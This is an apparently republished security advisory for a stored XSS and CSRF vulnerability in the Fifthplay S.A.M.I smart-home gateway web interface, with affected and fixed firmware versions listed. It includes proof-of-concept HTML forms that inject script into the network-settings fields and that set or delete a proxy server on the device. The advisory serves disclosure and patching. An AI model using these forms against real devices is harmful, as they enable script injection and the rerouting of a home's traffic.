Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Fifthplay S.A.M.I - Service And Management Interface Unauthenticated Stored XSS

🗓️ 28 Jan 2020 00:00:00Reported by Gjoko KrsticHigh five to Joris!Type 
zeroscience
 zeroscience🔗 www.zeroscience.mk👁 55 Views

Fifthplay S.A.M.I Unauthenticated Stored XSS through POST request allows execution of arbitrary HTML and script code in user's browser session. Vendor has released firmware updates to fix the issues

Related
Code
ReporterTitlePublishedViews
Family
CNVD		Fifthplay S.A.M.I Cross-Site Scripting Vulnerability
24 Apr 202000:00
cnvd
CVE		CVE-2020-12132
23 Apr 202023:50
cve
Cvelist		CVE-2020-12132
23 Apr 202023:50
cvelist
EUVD		EUVD-2020-4447
7 Oct 202500:30
euvd
NVD		CVE-2020-12132
24 Apr 202000:15
nvd
Prion		Cross site scripting
24 Apr 202000:15
prion
RedhatCVE		CVE-2020-12132
9 Jan 202609:57
redhatcve
<html><body><p>Fifthplay S.A.M.I - Service And Management Interface Unauthenticated Stored XSS


Vendor: Fifthplay NV
Product web page: https://www.fifthplay.com
Affected version: Platform: HAM V1.2
                            HAM V1.1
                            HAM V1.0
                            DINHAM 10W
                  Image Version: 2019.3-20190605144803
                                 2019.2_HP-20190808154634
                                 2018.4_HP-20181015152950
                                 2018.2-20180516100815
                                 2017.2_HP-20180213083050
                                 2013.4_HP-201309301203
                  AMP Version: 2019.2_HP
                               2018.4_HP
                               2017.2_HP
                               2013.4_HP
                               R20.19.03
                               R20.18.02
                  Fix: 2017.2-HP4
                       2018.4_HP3
                       2018.5_HP7
                       2019.2_HP3
                       2019.3_HP1

Summary: Fifthplay is a Belgian high-tech player and a subsidiary of Niko Group. 
We specialise in enriching smart homes and buildings for almost 10 years, and in
services that provide comfort and energy. Our gateway provides a modular approach
to integrating old and new technologies, such as smart meters, optical meters,
sockets, switches. Fifthplay is a trendsetter with regards to smart homes and buildings
and one of the sector's most innovative companies.

Desc: The application suffers from an unauthenticated stored XSS through POST request.
The issue is triggered when input passed via several parameters is not properly
sanitized before being returned to the user. This can be exploited to execute arbitrary
HTML and script code in a user's browser session in context of an affected site. The
application interface also allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can be exploited
to perform certain actions if a user visits a malicious web site.

Tested on: lighttpd/1.4.33
           PHP/5.4.33
           PHP/5.3.19


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5561
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5561.php


29.09.2019

--


Stored XSS:
-----------


  </p>
<form action="http://192.168.11.1/?page=networksettings" method="POST">
<input name="server" type="hidden" value='"&gt;&lt;script&gt;prompt(251)&lt;/script&gt;'/>
<input name="port" type="hidden" value='"&gt;&lt;script&gt;prompt(252)&lt;/script&gt;'/>
<input name="auth" type="hidden" value="1"/>
<input name="user" type="hidden" value='"&gt;&lt;script&gt;prompt(253)&lt;/script&gt;'/>
<input name="pass" type="hidden" value='"&gt;&lt;script&gt;prompt(254)&lt;/script&gt;'/>
<input name="submit" type="hidden" value="Change"/>
<input type="submit" value="Write"/>
</form>
  



Set proxy CSRF:
---------------

  
    <form action="http://192.168.11.1/?page=networksettings" method="POST">
<input name="server" type="hidden" value="proxy.segfault.mk"/>
<input name="port" type="hidden" value="8080"/>
<input name="auth" type="hidden" value="1"/>
<input name="user" type="hidden" value="testuser"/>
<input name="pass" type="hidden" value="testpass"/>
<input name="submit" type="hidden" value="Change"/>
<input type="submit" value="Write"/>
</form>
  



Delete proxy CSRF:
------------------


  
    <form action="http://192.168.11.1/?page=networksettings" method="POST">
<input name="server" type="hidden" value="proxy.segfault.mk"/>
<input name="port" type="hidden" value="8080"/>
<input name="auth" type="hidden" value="1"/>
<input name="user" type="hidden" value="testuser"/>
<input name="pass" type="hidden" value="testpass"/>
<input name="delete" type="hidden" value="Delete"/>
<input type="submit" value="Clear"/>
</form>
</body></html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Jan 2020 00:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 24.3
CVSS 3.16.1
EPSS0.00521
fifthplay s.a.m.ixsspost requestarbitrary code executionfirmware updates
55